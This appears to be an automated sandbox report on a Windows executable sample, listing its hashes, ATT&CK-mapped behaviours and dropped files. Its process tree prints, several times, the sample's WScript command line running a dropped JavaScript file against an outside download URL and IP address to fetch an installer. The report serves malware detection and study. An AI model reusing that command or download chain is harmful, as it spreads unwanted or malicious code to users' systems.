Analysis
-
max time kernel
44s -
max time network
40s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
19/09/2024, 04:08
Static task
static1
Behavioral task
behavioral1
Sample
3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe
Resource
win7-20240903-en
General
-
Target
3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe
-
Size
184KB
-
MD5
e2e9f0655390aa71e5d0ef7f39cfd7b0
-
SHA1
d35d2531fd41a8dc6680979dc213de2ce0aae128
-
SHA256
3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3
-
SHA512
a4c5f47b03c3f429b4fdff911d34e362bf462ec4cde407d516a40cbc12d5dd5cd916925fa2d6157e388259147ba75661bdfc7b61160b94502f3337bb983fb759
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3I:/7BSH8zUB+nGESaaRvoB7FJNndn9
Malware Config
Signatures
-
Blocklisted process makes network request 11 IoCs
flow pid Process 6 1012 WScript.exe 8 1012 WScript.exe 10 1012 WScript.exe 12 2640 WScript.exe 13 2640 WScript.exe 15 1392 WScript.exe 16 1392 WScript.exe 18 1556 WScript.exe 19 1556 WScript.exe 21 628 WScript.exe 22 628 WScript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 1964 wrote to memory of 1012 1964 3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe 30 PID 1964 wrote to memory of 1012 1964 3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe 30 PID 1964 wrote to memory of 1012 1964 3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe 30 PID 1964 wrote to memory of 1012 1964 3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe 30 PID 1964 wrote to memory of 2640 1964 3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe 32 PID 1964 wrote to memory of 2640 1964 3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe 32 PID 1964 wrote to memory of 2640 1964 3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe 32 PID 1964 wrote to memory of 2640 1964 3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe 32 PID 1964 wrote to memory of 1392 1964 3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe 35 PID 1964 wrote to memory of 1392 1964 3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe 35 PID 1964 wrote to memory of 1392 1964 3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe 35 PID 1964 wrote to memory of 1392 1964 3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe 35 PID 1964 wrote to memory of 1556 1964 3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe 37 PID 1964 wrote to memory of 1556 1964 3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe 37 PID 1964 wrote to memory of 1556 1964 3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe 37 PID 1964 wrote to memory of 1556 1964 3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe 37 PID 1964 wrote to memory of 628 1964 3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe 39 PID 1964 wrote to memory of 628 1964 3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe 39 PID 1964 wrote to memory of 628 1964 3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe 39 PID 1964 wrote to memory of 628 1964 3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe"C:\Users\Admin\AppData\Local\Temp\3a14e287d9403046806a078d0bf9a411f9e344a10ba17ab3e0bd64c5702816f3N.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf82D6.js" http://www.djapp.info/?domain=RfoaUvZHfB.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rU C:\Users\Admin\AppData\Local\Temp\fuf82D6.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:1012
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf82D6.js" http://www.djapp.info/?domain=RfoaUvZHfB.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rU C:\Users\Admin\AppData\Local\Temp\fuf82D6.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:2640
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf82D6.js" http://www.djapp.info/?domain=RfoaUvZHfB.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rU C:\Users\Admin\AppData\Local\Temp\fuf82D6.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:1392
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf82D6.js" http://www.djapp.info/?domain=RfoaUvZHfB.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rU C:\Users\Admin\AppData\Local\Temp\fuf82D6.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:1556
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf82D6.js" http://www.djapp.info/?domain=RfoaUvZHfB.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rU C:\Users\Admin\AppData\Local\Temp\fuf82D6.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:628
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57fb5fa1534dcf77f2125b2403b30a0ee
SHA1365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA25633a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD5f899351f383fbe26cc2c652024235bc3
SHA1293a52a888905d647325787c4cb2bddf3eed1404
SHA2562bb58091f687954b74a63c3e41a8f10203fcf581c1a118f8eef967b60163154d
SHA512a3f2441179a5dd40d5762ac4905364954495694f25d5006d0e6d9f5bce7ed527005e43acd3b51623fc223bd4dc153c9bf7f5abf3a213f1e7f894b4ea5ad21c9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD57d6b7dc6e4007fa4d00f1ef423f627a8
SHA1b3ac3ea1e1f584d17d79069a0d7936e8a4c027be
SHA256bec387dc76685e4ed8a3b503c9de3bab0899fdf1c8bdaec33c02c80d76674003
SHA512d4301763f4c9ff8525f351e983a20aec8df8eb672629a23ee9a460ac00be38f3fbed3c145f784fc599144af329d9049150717cdc127c997a2a8cf850976da753
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\domain_profile[1].htm
Filesize6KB
MD57619684027db01ffc726ae743b14fe1a
SHA1e60de9f745359e428028fd649a040d1d20d015b1
SHA256ddf36ccad927a0d3de0c4cbfe69a1100500dcd7570a14d112b0c53370045a123
SHA512d60c395079acf227032d3148eb864a4cbd9c19c7dcafd826448b3cec4f3fdeae8cb7af4eba981130210d8936c7edb794a6ff332ea68b38c917b14bbcadf0c5f6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\domain_profile[1].htm
Filesize40KB
MD513e05391eeeb4ee826134af324b78103
SHA1aac9534feeba7572b12643bde341d91f8640e57c
SHA256e2c586bdeba1926d30e3fa1f5660434ed4796a4800432825af72a371f62fbf37
SHA51253014f912e631e08dbc31124390c43405df55d1e9ba63f10e5c7edc710bd47dfa62f6b4ce67157d90490409d398455931f386c04349612c87b9769ce775c4c36
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S8GI6B9B\domain_profile[1].htm
Filesize6KB
MD5bc2fd5a4bf933c7f2de6f66393857ce7
SHA1bc0790930247b3fbeeee974aa03015ee58c46775
SHA2563cb46e7d9c0adedfa5c1378eabb584643fd91741acae95b7b5a2e3b3f1eb6130
SHA5122617d49f39a26310391418135507b06edd696dae9be47217159c8fd020bf3c7e2f6107918c4bd68b13c1ff775815287aa5fd07ff74484820476ebf92ef5b5a40
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S8GI6B9B\domain_profile[1].htm
Filesize40KB
MD54276c44566a97b0646e210b0a83951d6
SHA1de211d8bcd0ee86170e5b4eb661ec78a35a3954c
SHA25616c12522909a4f7f084e189aafd7b369c7b4d6a4d9e7cabb199ebca38f32249e
SHA5120114972bfb1e42191fec85445a1992d3460f65b9bd1b1bfc42d0b22b229c068d06bb81f82aa344cf64a1fd7d6b933e5e8fcc97c7b279b6daa8957b859ff74f44
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76
-
Filesize
177B
MD538ed41b9628de6e9116b3b9d105170e8
SHA1e4d6e17378e68eb3532182f54ad4614f1008cec5
SHA256459d099d72fc2879b20ca14d41e9af5622f551162ad4bd40dbd503bf93bd3f65
SHA51249d16f6c78d6a809247b9e6efd1cb04ca447089af0844a780a3514676384b77850bc7002cbb33409816c4d9ebaa947e1888b24a6835d58891d6de2d59b442e63